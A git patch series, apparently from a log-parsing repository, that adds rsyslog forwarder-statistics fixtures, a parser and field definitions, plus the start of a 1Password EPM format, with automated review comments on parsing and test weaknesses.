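Review bot: `sekoiaio.forwarder.intake.name` is derived from `json.event.name.split('-', 1)[1]` for every record regardless of `origin`, and the fixtures in this patch show the result: `usage` for the `resource-usage` impstats record and `intake.sekoia.io-10514` for the `omfwd` output, neither of which is an intake; a module name without `-` would additionally make `[1]` an out-of-range index, and it is not visible here whether the template engine then skips the field, writes an empty string or fails the action. Guarding the derivation with a `filter:` on `json.event.origin` so it only runs for `core.action`, `core.queue`, `imtcp` and `imudp` records would keep the field honest. `sekoiaio.forwarder.input.port` has the same indexing hazard (`split('(')[1]`) and, per the input_udp fixture, stores `*/20517/IPv4` rather than a port, so either document it as a listener spec or isolate the port before storing it. `user.domain: "SEKOIA.IO"` is written unconditionally on what are rsyslog statistics records, not user activity, so these events will surface in user-centric searches on an ECS `user.*` field; unless something downstream depends on it, drop it. PATCH 039 (`Fix linter`) re-indents this stage without changing the expressions, so all of the above applies to its hunk as well.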
@@ -0,0 +1,28 @@
+{
+ "input": {
+ "message": "{\"name\":\"output-techno1\",\"origin\":\"core.action\",\"processed\": 0,\"failed\": 0,\"suspended\": 0, \"suspended.duration\": 0, \"resumed\": 0}"
+ },
+ "expected": {
+ "message": "{\"name\":\"output-techno1\",\"origin\":\"core.action\",\"processed\": 0,\"failed\": 0,\"suspended\": 0, \"suspended.duration\": 0, \"resumed\": 0}",
+ "sekoiaio": {
+ "forwarder": {
+ "action": {
+ "failed": 0,
+ "processed": 0,
+ "resumed": 0,
+ "suspended": 0
+ },
+ "intake": {
+ "name": "techno1"
+ },
+ "module": {
+ "name": "output-techno1",
+ "type": "core.action"
+ }
+ }
+ },
+ "user": {
+ "domain": "SEKOIA.IO"
+ }
+ }
+}
\ No newline at end of file
diff --git a/SekoiaIO/forwarder_log/tests/da_queue_log.json b/SekoiaIO/forwarder_log/tests/da_queue_log.json
new file mode 100644
index 000000000..e37cd085f
--- /dev/null
+++ b/SekoiaIO/forwarder_log/tests/da_queue_log.json
@@ -0,0 +1,32 @@
+{
+ "input": {
+ "message": "{ \"name\": \"ruleset-my-techno1[DA]\", \"origin\": \"core.queue\", \"size\": 0, \"enqueued\": 0, \"full\": 0, \"discarded.full\": 0, \"discarded.nf\": 0, \"maxqsize\": 0 }"
+ },
+ "expected": {
+ "message": "{ \"name\": \"ruleset-my-techno1[DA]\", \"origin\": \"core.queue\", \"size\": 0, \"enqueued\": 0, \"full\": 0, \"discarded.full\": 0, \"discarded.nf\": 0, \"maxqsize\": 0 }",
+ "sekoiaio": {
+ "forwarder": {
+ "intake": {
+ "name": "my-techno1"
+ },
+ "module": {
+ "name": "ruleset-my-techno1[DA]",
+ "type": "core.queue"
+ },
+ "queue": {
+ "discarded": {
+ "full": 0,
+ "nf": 0
+ },
+ "enqueued": 0,
+ "full": 0,
+ "maxqsize": 0,
+ "size": 0
+ }
+ }
+ },
+ "user": {
+ "domain": "SEKOIA.IO"
+ }
+ }
+}
\ No newline at end of file
diff --git a/SekoiaIO/forwarder_log/tests/input_tcp.json b/SekoiaIO/forwarder_log/tests/input_tcp.json
new file mode 100644
index 000000000..bc907046a
--- /dev/null
+++ b/SekoiaIO/forwarder_log/tests/input_tcp.json
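Review bot: Every counter in these fixtures is `0`, so the expectations cannot tell a correct mapping from one where two fields are swapped or one is silently dropped (`failed` versus `processed` in action_log.json, `discarded.full` versus `discarded.nf` in da_queue_log.json); distinct non-zero values, as stats.json in this same patch already uses, would make the tests meaningful. The same applies to input_tcp.json, input_udp.json, memory_queue_log.json and output_log.json. In action_log.json the input also carries `suspended.duration`, which nothing in the parser maps; please confirm that dropping it is intended.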
@@ -0,0 +1,26 @@
+{
+ "input": {
+ "message": "{ \"name\": \"input-techno1(20516)\", \"origin\": \"imtcp\", \"submitted\": 0 }"
+ },
+ "expected": {
+ "message": "{ \"name\": \"input-techno1(20516)\", \"origin\": \"imtcp\", \"submitted\": 0 }",
+ "sekoiaio": {
+ "forwarder": {
+ "input": {
+ "port": "20516",
+ "submitted": 0
+ },
+ "intake": {
+ "name": "techno1"
+ },
+ "module": {
+ "name": "input-techno1(20516)",
+ "type": "imtcp"
+ }
+ }
+ },
+ "user": {
+ "domain": "SEKOIA.IO"
+ }
+ }
+}
\ No newline at end of file
diff --git a/SekoiaIO/forwarder_log/tests/input_udp.json b/SekoiaIO/forwarder_log/tests/input_udp.json
new file mode 100644
index 000000000..96b69fe2f
--- /dev/null
+++ b/SekoiaIO/forwarder_log/tests/input_udp.json
@@ -0,0 +1,26 @@
+{
+ "input": {
+ "message": "{ \"name\": \"input-my-techno2(*/20517/IPv4)\", \"origin\": \"imudp\", \"submitted\": 0, \"disallowed\": 0 }"
+ },
+ "expected": {
+ "message": "{ \"name\": \"input-my-techno2(*/20517/IPv4)\", \"origin\": \"imudp\", \"submitted\": 0, \"disallowed\": 0 }",
+ "sekoiaio": {
+ "forwarder": {
+ "input": {
+ "port": "*/20517/IPv4",
+ "submitted": 0
+ },
+ "intake": {
+ "name": "my-techno2"
+ },
+ "module": {
+ "name": "input-my-techno2(*/20517/IPv4)",
+ "type": "imudp"
+ }
+ }
+ },
+ "user": {
+ "domain": "SEKOIA.IO"
+ }
+ }
+}
\ No newline at end of file
diff --git a/SekoiaIO/forwarder_log/tests/memory_queue_log.json b/SekoiaIO/forwarder_log/tests/memory_queue_log.json
new file mode 100644
index 000000000..ca28db9a5
--- /dev/null
+++ b/SekoiaIO/forwarder_log/tests/memory_queue_log.json
@@ -0,0 +1,32 @@
+{
+ "input": {
+ "message": "{ \"name\": \"ruleset-techno1\", \"origin\": \"core.queue\", \"size\": 0, \"enqueued\": 0, \"full\": 0, \"discarded.full\": 0, \"discarded.nf\": 0, \"maxqsize\": 0 }"
+ },
+ "expected": {
+ "message": "{ \"name\": \"ruleset-techno1\", \"origin\": \"core.queue\", \"size\": 0, \"enqueued\": 0, \"full\": 0, \"discarded.full\": 0, \"discarded.nf\": 0, \"maxqsize\": 0 }",
+ "sekoiaio": {
+ "forwarder": {
+ "intake": {
+ "name": "techno1"
+ },
+ "module": {
+ "name": "ruleset-techno1",
+ "type": "core.queue"
+ },
+ "queue": {
+ "discarded": {
+ "full": 0,
+ "nf": 0
+ },
+ "enqueued": 0,
+ "full": 0,
+ "maxqsize": 0,
+ "size": 0
+ }
+ }
+ },
+ "user": {
+ "domain": "SEKOIA.IO"
+ }
+ }
+}
\ No newline at end of file
diff --git a/SekoiaIO/forwarder_log/tests/output_log.json b/SekoiaIO/forwarder_log/tests/output_log.json
new file mode 100644
index 000000000..592b5c615
--- /dev/null
+++ b/SekoiaIO/forwarder_log/tests/output_log.json
@@ -0,0 +1,27 @@
+{
+ "input": {
+ "message": "{ \"name\": \"TCP-intake.sekoia.io-10514\", \"origin\": \"omfwd\", \"bytes.sent\": 0 }"
+ },
+ "expected": {
+ "message": "{ \"name\": \"TCP-intake.sekoia.io-10514\", \"origin\": \"omfwd\", \"bytes.sent\": 0 }",
+ "sekoiaio": {
+ "forwarder": {
+ "intake": {
+ "name": "intake.sekoia.io-10514"
+ },
+ "module": {
+ "name": "TCP-intake.sekoia.io-10514",
+ "type": "omfwd"
+ },
+ "output": {
+ "bytes": {
+ "sent": 0
+ }
+ }
+ }
+ },
+ "user": {
+ "domain": "SEKOIA.IO"
+ }
+ }
+}
\ No newline at end of file
diff --git a/SekoiaIO/forwarder_log/tests/stats.json b/SekoiaIO/forwarder_log/tests/stats.json
new file mode 100644
index 000000000..4ed525d49
--- /dev/null
+++ b/SekoiaIO/forwarder_log/tests/stats.json
@@ -0,0 +1,27 @@
+{
+ "input": {
+ "message": "{ \"name\": \"resource-usage\", \"origin\": \"impstats\", \"utime\": 134625, \"stime\": 20397, \"maxrss\": 13888, \"minflt\": 1510, \"majflt\": 0, \"inblock\": 0, \"oublock\": 272, \"nvcsw\": 347, \"nivcsw\": 31, \"openfiles\": 15 }"
+ },
+ "expected": {
+ "message": "{ \"name\": \"resource-usage\", \"origin\": \"impstats\", \"utime\": 134625, \"stime\": 20397, \"maxrss\": 13888, \"minflt\": 1510, \"majflt\": 0, \"inblock\": 0, \"oublock\": 272, \"nvcsw\": 347, \"nivcsw\": 31, \"openfiles\": 15 }",
+ "sekoiaio": {
+ "forwarder": {
+ "intake": {
+ "name": "usage"
+ },
+ "module": {
+ "name": "resource-usage",
+ "type": "impstats"
+ },
+ "stats": {
+ "openfiles": 15,
+ "stime": 20397,
+ "utime": 134625
+ }
+ }
+ },
+ "user": {
+ "domain": "SEKOIA.IO"
+ }
+ }
+}
\ No newline at end of file
From f7ca14b95e95bfda95bdb2c344f4d3d6f05f85cc Mon Sep 17 00:00:00 2001
From: Pierre Penhouet
Date: Mon, 16 Sep 2024 23:59:55 +0200
Subject: [PATCH 038/317] Fix lintier
---
SekoiaIO/forwarder_log/_meta/fields.yml | 105 ++++++++++++------------
1 file changed, 54 insertions(+), 51 deletions(-)
diff --git a/SekoiaIO/forwarder_log/_meta/fields.yml b/SekoiaIO/forwarder_log/_meta/fields.yml
index a172f31a9..70ea30cab 100644
--- a/SekoiaIO/forwarder_log/_meta/fields.yml
+++ b/SekoiaIO/forwarder_log/_meta/fields.yml
@@ -1,26 +1,16 @@ -sekoiaio.forwarder.module.type: - description: This identifies the module type for which the statistics are being reported - name: sekoiaio.forwarder.module.type - type: keyword - -sekoiaio.forwarder.module.name: - description: This identifies the module name for which the statistics are being reported - name: sekoiaio.forwarder.module.name - type: keyword - -sekoiaio.forwarder.intake.name: - description: Intake name defined in the forwarder - name: sekoiaio.forwarder.intake.name - type: keyword +sekoiaio.forwarder.action.failed: + description: Number of messages failed in the action + name: sekoiaio.forwarder.action.failed + type: number sekoiaio.forwarder.action.processed: description: Number of messages processed by the action name: sekoiaio.forwarder.action.processed type: number -sekoiaio.forwarder.action.failed: - description: Number of messages failed in the action - name: sekoiaio.forwarder.action.failed +sekoiaio.forwarder.action.resumed: + description: Number of messages resumed by the action + name: sekoiaio.forwarder.action.resumed type: number sekoiaio.forwarder.action.suspended: 
@@ -28,24 +18,36 @@ sekoiaio.forwarder.action.suspended: name: sekoiaio.forwarder.action.suspended type: number -sekoiaio.forwarder.action.resumed: - description: Number of messages resumed by the action - name: sekoiaio.forwarder.action.resumed - type: number +sekoiaio.forwarder.input.port: + description: Input port use by the forwarder + name: sekoiaio.forwarder.input.port + type: keyword -sekoiaio.forwarder.queue.size: - description: Number of messages in the queue - name: sekoiaio.forwarder.queue.size +sekoiaio.forwarder.input.submitted: + description: Number of messages handled by the forwarder input + name: sekoiaio.forwarder.input.submitted type: number -sekoiaio.forwarder.queue.enqueued: - description: Total number of messages enqueued into this queue since startup - name: sekoiaio.forwarder.queue.enqueued - type: number +sekoiaio.forwarder.intake.name: + description: Intake name defined in the forwarder + name: sekoiaio.forwarder.intake.name + type: keyword -sekoiaio.forwarder.queue.full: - description: Number of times the queue was actually full and could not accept additional messages - name: sekoiaio.forwarder.queue.full +sekoiaio.forwarder.module.name: + description: This identifies the module name for which the statistics are being + reported + name: sekoiaio.forwarder.module.name + type: keyword + +sekoiaio.forwarder.module.type: + description: This identifies the module type for which the statistics are being + reported + name: sekoiaio.forwarder.module.type + type: keyword + +sekoiaio.forwarder.output.bytes.sent: + description: Number of bytes sent to Sekoia + name: sekoiaio.forwarder.output.bytes.sent type: number sekoiaio.forwarder.queue.discarded.full: 
@@ -58,29 +60,31 @@ sekoiaio.forwarder.queue.discarded.nf: name: sekoiaio.forwarder.queue.discarded.nf type: number -sekoiaio.forwarder.queue.maxqsize: - description: The maximum amount of messages that have passed through the queue since rsyslog was started - name: sekoiaio.forwarder.queue.maxqsize +sekoiaio.forwarder.queue.enqueued: + description: Total number of messages enqueued into this queue since startup + name: sekoiaio.forwarder.queue.enqueued type: number -sekoiaio.forwarder.output.bytes.sent: - description: Number of bytes sent to Sekoia - name: sekoiaio.forwarder.output.bytes.sent +sekoiaio.forwarder.queue.full: + description: Number of times the queue was actually full and could not accept additional + messages + name: sekoiaio.forwarder.queue.full type: number -sekoiaio.forwarder.input.submitted: - description: Number of messages handled by the forwarder input - name: sekoiaio.forwarder.input.submitted +sekoiaio.forwarder.queue.maxqsize: + description: The maximum amount of messages that have passed through the queue since + rsyslog was started + name: sekoiaio.forwarder.queue.maxqsize type: number -sekoiaio.forwarder.input.port: - description: Input port use by the forwarder - name: sekoiaio.forwarder.input.port - type: keyword +sekoiaio.forwarder.queue.size: + description: Number of messages in the queue + name: sekoiaio.forwarder.queue.size + type: number -sekoiaio.forwarder.stats.utime: - description: The amount of user CPU time consumed by rsyslog, in milliseconds. - name: sekoiaio.forwarder.stats.utime +sekoiaio.forwarder.stats.openfiles: + description: Number of file handles used by rsyslog + name: sekoiaio.forwarder.stats.openfiles type: number sekoiaio.forwarder.stats.stime: 
@@ -88,8 +92,7 @@ sekoiaio.forwarder.stats.stime: name: sekoiaio.forwarder.stats.stime type: number -sekoiaio.forwarder.stats.openfiles: - description: Number of file handles used by rsyslog - name: sekoiaio.forwarder.stats.openfiles +sekoiaio.forwarder.stats.utime: + description: The amount of user CPU time consumed by rsyslog, in milliseconds. + name: sekoiaio.forwarder.stats.utime type: number - From 17ee0554793daedf59589241f3f31aeef67fd1e4 Mon Sep 17 00:00:00 2001 From: Pierre Penhouet Date: Tue, 17 Sep 2024 00:08:11 +0200 Subject: [PATCH 039/317] Fix linter --- SekoiaIO/forwarder_log/ingest/parser.yml | 49 +++++++++++------------- 1 file changed, 23 insertions(+), 26 deletions(-) diff --git a/SekoiaIO/forwarder_log/ingest/parser.yml b/SekoiaIO/forwarder_log/ingest/parser.yml index ee671e5c7..66cc5b540 100644 --- a/SekoiaIO/forwarder_log/ingest/parser.yml +++ b/SekoiaIO/forwarder_log/ingest/parser.yml 
@@ -8,30 +8,27 @@ pipeline: output_field: event - name: set_common_fields -stages: +stages: set_common_fields: - actions: - - set: - user.domain: "SEKOIA.IO" - sekoiaio.forwarder.intake.name: "{{ json.event.name.split('-', 1)[1].split('[')[0].split('(')[0]}}" - sekoiaio.forwarder.module.name: "{{json.event.name}}" - sekoiaio.forwarder.module.type: "{{json.event.origin}}" - sekoiaio.forwarder.action.processed: "{{json.event.processed}}" - sekoiaio.forwarder.action.failed: "{{json.event.failed}}" - sekoiaio.forwarder.action.suspended: "{{json.event.suspended}}" - sekoiaio.forwarder.action.resumed: "{{json.event.resumed}}" - sekoiaio.forwarder.queue.size: "{{json.event.size}}" - sekoiaio.forwarder.queue.enqueued: "{{json.event.enqueued}}" - sekoiaio.forwarder.queue.full: "{{json.event.full}}" - sekoiaio.forwarder.queue.discarded.full: "{{json.event.get('discarded.full')}}" - sekoiaio.forwarder.queue.discarded.nf: "{{json.event.get('discarded.nf')}}" - sekoiaio.forwarder.queue.maxqsize: "{{json.event.maxqsize}}" - sekoiaio.forwarder.output.bytes.sent: "{{json.event.get('bytes.sent')}}" - sekoiaio.forwarder.input.submitted: "{{json.event.submitted}}" - sekoiaio.forwarder.input.port: "{{ json.event.name.split('(')[1].split(')')[0] }}" - sekoiaio.forwarder.stats.utime: "{{json.event.utime}}" - sekoiaio.forwarder.stats.stime: "{{json.event.stime}}" - sekoiaio.forwarder.stats.openfiles: "{{json.event.openfiles}}" - - - \ No newline at end of file + actions: + - set: + user.domain: "SEKOIA.IO" + sekoiaio.forwarder.intake.name: "{{ json.event.name.split('-', 1)[1].split('[')[0].split('(')[0]}}" + sekoiaio.forwarder.module.name: "{{json.event.name}}" + sekoiaio.forwarder.module.type: "{{json.event.origin}}" + sekoiaio.forwarder.action.processed: "{{json.event.processed}}" + sekoiaio.forwarder.action.failed: "{{json.event.failed}}" + sekoiaio.forwarder.action.suspended: "{{json.event.suspended}}" + sekoiaio.forwarder.action.resumed: "{{json.event.resumed}}" + 
sekoiaio.forwarder.queue.size: "{{json.event.size}}" + sekoiaio.forwarder.queue.enqueued: "{{json.event.enqueued}}" + sekoiaio.forwarder.queue.full: "{{json.event.full}}" + sekoiaio.forwarder.queue.discarded.full: "{{json.event.get('discarded.full')}}" + sekoiaio.forwarder.queue.discarded.nf: "{{json.event.get('discarded.nf')}}" + sekoiaio.forwarder.queue.maxqsize: "{{json.event.maxqsize}}" + sekoiaio.forwarder.output.bytes.sent: "{{json.event.get('bytes.sent')}}" + sekoiaio.forwarder.input.submitted: "{{json.event.submitted}}" + sekoiaio.forwarder.input.port: "{{ json.event.name.split('(')[1].split(')')[0] }}" + sekoiaio.forwarder.stats.utime: "{{json.event.utime}}" + sekoiaio.forwarder.stats.stime: "{{json.event.stime}}" + sekoiaio.forwarder.stats.openfiles: "{{json.event.openfiles}}" From bb25ceae66d6902ded7ef89de932185714037ccb Mon Sep 17 00:00:00 2001 
From: lvoloshyn-sekoia Date: Mon, 16 Sep 2024 21:12:43 +0300 Subject: [PATCH 040/317] Add 1Password EPM format --- 1Password/1password-epm/CHANGELOG.md | 8 ++ 1Password/1password-epm/_meta/fields.yml | 44 ++++++++ 1Password/1password-epm/_meta/logo.png | Bin 0 -> 11824 bytes 1Password/1password-epm/_meta/manifest.yml | 11 ++ .../_meta/smart-descriptions.json | 29 +++++ 1Password/1password-epm/ingest/parser.yml | 105 ++++++++++++++++++ .../tests/test_audit_events.json | 65 +++++++++++ .../tests/test_item_usage_events.json | 60 ++++++++++ .../tests/test_sign_in_attempts.json | 59 ++++++++++ 1Password/README.md | 7 ++ 1Password/_meta/logo.png | Bin 0 -> 11824 bytes 1Password/_meta/manifest.yml | 5 + 12 files changed, 393 insertions(+) create mode 100644 1Password/1password-epm/CHANGELOG.md create mode 100644 1Password/1password-epm/_meta/fields.yml create mode 100644 1Password/1password-epm/_meta/logo.png create mode 100644 1Password/1password-epm/_meta/manifest.yml create mode 100644 1Password/1password-epm/_meta/smart-descriptions.json create mode 100644 1Password/1password-epm/ingest/parser.yml create mode 100644 1Password/1password-epm/tests/test_audit_events.json create mode 100644 1Password/1password-epm/tests/test_item_usage_events.json create mode 100644 1Password/1password-epm/tests/test_sign_in_attempts.json create mode 100644 1Password/README.md create mode 100644 1Password/_meta/logo.png create mode 100644 1Password/_meta/manifest.yml diff --git a/1Password/1password-epm/CHANGELOG.md b/1Password/1password-epm/CHANGELOG.md new file mode 100644 index 000000000..11bddf32c --- /dev/null +++ b/1Password/1password-epm/CHANGELOG.md @@ -0,0 +1,8 @@ +# Changelog + +All notable changes to this project will be documented in this file. + +The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/), +and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html). + +## [Unreleased] 
diff --git a/1Password/1password-epm/_meta/fields.yml b/1Password/1password-epm/_meta/fields.yml
new file mode 100644
index 000000000..114fc1d9b
--- /dev/null
+++ b/1Password/1password-epm/_meta/fields.yml
@@ -0,0 +1,44 @@
+1password.category:
+ description: ''
+ name: 1password.category
+ type: keyword
+
+1password.item_uuid:
+ description: ''
+ name: 1password.item_uuid
+ type: keyword
+
+1password.object.email:
+ description: ''
+ name: 1password.object.email
+ type: keyword
+
+1password.object.name:
+ description: ''
+ name: 1password.object.name
+ type: keyword
+
+1password.object.type:
+ description: ''
+ name: 1password.object.type
+ type: keyword
+
+1password.object.uuid:
+ description: ''
+ name: 1password.object.uuid
+ type: keyword
+
+1password.session_uuid:
+ description: ''
+ name: 1password.session_uuid
+ type: keyword
+
+1password.type:
+ description: ''
+ name: 1password.type
+ type: keyword
+
+1password.vault_uuid:
+ description: ''
+ name: 1password.vault_uuid
+ type: keyword
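Review bot: All nine `1password.*` fields in this new file are declared with `description: ''`, so the keys ship undocumented in the field catalogue. Short descriptions derived from what the parser maps would be enough, e.g. `description: Category of the sign-in attempt reported by 1Password (e.g. success, firewall_failed)` for `1password.category` and `description: UUID of the 1Password session the event belongs to` for `1password.session_uuid`, with the same pattern for the object, vault and item identifiers.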
diff --git a/1Password/1password-epm/_meta/logo.png b/1Password/1password-epm/_meta/logo.png new file mode 100644 index 0000000000000000000000000000000000000000..d8fbd396e5dd798f4530be439b902acae10c5f19 GIT binary patch literal 11824 zcmW++1yCGK6U7n;?ykY@kOK|~1P|`+mf&`{TX1*x1PJaDg3Cd02@qTk_k-Z}-}hI| zPR;c8d)@td_G)YEqSaJnvCzrU5fBit786+se%PYXgCkSWe;}f8upoRkh0A9E=BO{A| zfG`lq$I1C0mW_?${d-0@KRhU$fs2cajST=_u(5G+aRa%z`1tt+xVeG+{6g@E9GpDN zEbKfya30`)Satw>aB^~U!Y^(h4-emegO?v3f|vKdSa41NfQN&F3qHdKoDiPF|504< z^tia-B=9N(7@61v1x467;3Rx-A0|dtc6Pvjm2v~&K5z%Pn}C22KffS64m?%3EDQ`R zZ0sD2jI3}UUS5749)5NfItC3kT9GO?gNLz zGXe4m!qVh6BH5=78Vr~mxd=yOGp3V!$){@xP^s<6;4P=NdtF=+u3N1 ziAgBn`oQ}RZyC>jYVh&$2=Ktg-rwTCJU#5UV%=U5J(2S>T|YgYJ+41d z-fy=t(DFVjeAoQQ`m!u@y)*7&q9XBhHqcoqcVFfE1#okeo$8=}b#e%8_+q9xJ2lo( zS`-^0^(H(-c&fi7(Ow0%Jec`%f8X5@;I0RW3-*Mq<%PK)FLb4$Jf6*ur+@9RJM3@% zQ(v@^5m{-XiLi};z_utaEurPTe3BonOCU=*49flNW}}oV)xY*0O)nuBO-6{pgs>WY znT^e^Wnp>Xn@-h@Q%g-tWKB)i`OS5gsFfFR$;hF9SL)H!Lm=0M1!TSy=AVXjnZ!&J z7-+rM*7Pe&VcHxV*U^x8SP%RBWwH58Z)SdGrlre%3g)=d>h4}FCemv0T-GAsfTVML zkXe6JkE!{dqIH?+1+6;Q&eZpKHdmCU#mMJr7qaIen^0}oRy%5>u^7BA)OZ^Xku_Pr zRT`_fDipo-bi~T&6+E-yw;;2s_V@<7E}1aySrfTkG!>ed(#_bS%fk=tD;f|_`7R-x zB@n?X4@h_X$9~Am{}Cgm(cZ4DYw2nt`n-pRnwku+ zqLKF(kS|P=FdUkb1r{YE!FhOi=nVc$+O$*zy9s}M{N?xSgWF5@Qu3lOxd7SmTvFF| zzu|e%$_e&5^bBh~GKu2;1v!tzyP(9oZ_CBzxB5R{QPw`WB!uD_il~puTLD~Grolgh z9_PMsc{VS>WiV^0aa;)i+gmb&1V{SHHfi_wq`O7=!Y)y8=v*REQa&JlB2I|&Q@Vc@xWeCoOh#0ZB#PuCSh)ypCyg{}eTl<{jVK%nM>!6KusYvQ<}vl5yCa{{naiFA+_6R}EnhOftq}s%sHP=-J9G>G!DZ~m##foSu3rD69jXLz*Zb8A4OQ#s}>tv@%*1)&8x)HTAdYXnH< zC5E*JVUM(9&#?Ycblzk!RIKUeqrwF6Lx!gq3i=j zp$P1(25Jv|EpvD7DmuTqC>`FocM;ri`P<@OkE!3HYDxKQ!~pdU{VmEwi#G>RkO&D! 
zu}2Hq9O!z)riO6yX{xS-MPH}7FSUwVdu1$U+M<3fR?|#H9!6jy`7}(z(ZzcbLPGYQ zoGR*U^?`z^STR)`^nN2q@O%SDxcMu+9nge4y54=z{d62li@Wh-|C(tAgthB6N)e)ln42Z=E8v|hzriuI# z9lBa&;q>m9%SRRp}-a zWn_cxwXeCQ9MaCLiwGkRr@2VUsYST3Wu1KR10vr~#!S<=>od(7zn8TavDJg>U9(Cu zkc<-J8|x1D3b&4aCK`})7w2W@9DP3_5MXXj;pC|DX30|Pib*e*`xnwvtC@60Pp(eoAU1*SQYa}~dy5d=96 zYfX6#Qy2eW zGQm(%2}>_f)(a<}Gh)Wc8Kx*^Fv@j>TwmVU1oXGBJ7nDc(0voQTC;GYL%iTyuIW%$ z$u7~~vP=jp5M-KW_5@|9(@-1Nb(ALg)AeTr^cPW;Bx?}YwkX!In)#t)HoEbUVv5d% zRJ_Z7vRIivaBr33VR)CQubTc)fS$I?VlLV4rslm>r0ii_b8THnL$)RJLG`!IDeD)b zSG6Bwzb&{86<|058Xo%w+UXphPWqdY2-egH!^2$CSUvrYNEgRs16G>@`6kCu0tLfj z6Rf$+D*K|$hiP_&P{NWjEk)8lO;qq2MU*b-?TcKTVO{UUoX&nYH3|)LtPu^5AKr`N zb*C(>xNSmLqH;J3Df!cqQoK!jb-<||pC~bGeyHJjY(?a7)n?K1_=&bzm9OBa0$;X{ z2B?zOSbEYeLX;Ql_h_rS#82(|4!@CLOR@~z*HvSiDBwEmo4mO( zTs1o02Y=$RsdH;P%tcd1BfVo(4|Ax+bX49+A&IA~opcpe@qAf{hP2=m4n~T9M@!llS>U7v_%bFhNPiUlEmC*qJUGDG@jobfUF@ygBtHf`RT>x6cUO1G2w3!EDLX4AJLNo(lK2E%eO+wvopP-@ z%x2->KVMBCOI?-YgLH3h^?VXk87D17kV3IBRWWJ&WuSAY_DsD~gfLg-*5cxi%8@g2 zt(|hgP_A&JKO*&uIjaH|y`%e9&Fxs{jX{E8>WbF=6RJ}d$^91)C>ybVoER77d2(NX z@Xc>ZfhMOs2hs?O4`JRcmj0CFBoe6a9r{iwT6a`5?F#o^u3TKC!(!$IY4_jIKPz_? 
z(xoFJI?OZH;_z{A{SfO>gEA6@CP;O@KQggiYVqh4C?1V70mZ~0+L-P|TCz#q~9?ebKn&eQK|KFVMyB2&)m&@aw9Dv{=L zc4r;;Qz7?@?TS2;_nWc{>E`3!6^COY970;J=*P#hX#!`br(!-;13EnW^9Jg}Gx;X* z5n560&eDRub_5xO0CeR%G@&o?z(D1(jQiSc;acymV66!0Xo6rWmL8iy;)K)EmHr~y zxWRb#RwSfhfr%i7W&d>vHWW^%Ut=)#UBQNxVt;8vrp&q{NoWiiD#Jh#l4z^XHUs}8 zhjnw+SrWsyWE!oe_GxfbFk~n+lf?7W54jGnGa#0SvL~}f)wG8w!oec<_cByNTF$Ti z(`sn@M7i0Ii==Xm_t|gwn&U19>yuN|CcU#@9t0uzj}329ymE*0mt70!(#2_hVPMPa zhFqoF4}+A^Db8<`?fZ8a9r`-0wpc5TD!LP?p9NB*@^tuaIL$(Wu$Olg-?X5U z-THFwMqG3(FgPUmODH-H5}h>v9$PPVTf+DmeUHV=QG9|{qf=p09Kj=tp~CrOb=z@b zN_FEZ6QAmvw&T5f7Cx?Nf+xhuUuO90j(?In4&-pJWNqXv``YrL_Kd5-7Tss`KI5b4 z>uZsHqVKY7($2fg<>TK&L)HmzJBL#nRJ|8dX+&7rbfK5eEtq#|um&Ghyp4~naXoJ( zqwSN_qX~AEOm%r%OP$zp$0S865L`nkJz8v;dw291fKQr-xdgL}R)Cc63@H<6O zA<`P56eSW*Kwo!o`h1hW=2^ar12GJFn>3X`zNmeu3g$H5@OhWZzQk$Ng^;hNhYpoZ zvFNM;v&JDWBcVsVWE=@O&d!<>Ib&t=3;BSiu0|l9;PM2UdDfR2A0SP!+=4?;qx2e+Ue?3YyD&l6P|3xeil^v~op_P)-~t2#KcmW%e64a45-4|Q*Y zQIu4aUE`o=8s=!^SqQOg&l4p-Md)7Qhu6L>im^E7jqB%kKn?}>_K4h~z{eAQ1&l!K z*#W_0KTTm^v7$(;2`C^MgpTTdD zowJZqM6E3-=Y^1@vHh&QSRZu%65-TSyUnt}-U}BpG|uqgV6BRXrx-}=a~$nCg*N`@ zu0PIx+)F}xy?Pcr? z&r_tPSzv@<_ua78qZ%^mDuXqoH!Ry0nhz~5oNr+WKc&BC!bp)tT{%^qM2;IgihtG~0U_nge}yKD^J*5p z_Nzg>UEisbl#>Zp1(DBM#W9mKJguEnsLGs>v3P!lZ%tO*{YT$et0zvU{f6!Iqi_}% zl&~)5cBL>!s4YemSJPlRJaHxp8Dghff#(T`zk!t z(FDD}^hKZAfm@hzJop{@n085f@D|atwdC1?ZyNB%bW#5`twUv#pxC(^uw>^4FIOtqvv!BNt;W;}?BZr86Eu)QlHJ@Zx;^~koxLD& zE86C(xt}12MQ;2D;vk1y@4$PO@(glRU*`?_Dvv{pyzhrb1|=7N1_2A~Nm4&H;X)*> zcV{-ul|kf%Rqhlf!ces_@?zrb3o2E_pfeC`2h6o%^K##~+YtKPxvBOFr^UaYSAQIn z>8Qs?X7lIHPPH%jk4436B!A1%qC;FdKQ}B4gt&1Y^yz(TKE=8`;-PN&Cz=@uL4@_+ zG^m`$zcmqsNc0S?q^LAWku7N7r(pliI1FLqJ;Ty9h~YY%9TzO(&#`O`gPi~e)HsD| zLEijIbUv4E<2fb}L`0Q%K&h7zHQu~M9>atcaDdzIHGV?3`p{A&Gtg`3K>sO~nuv@! 
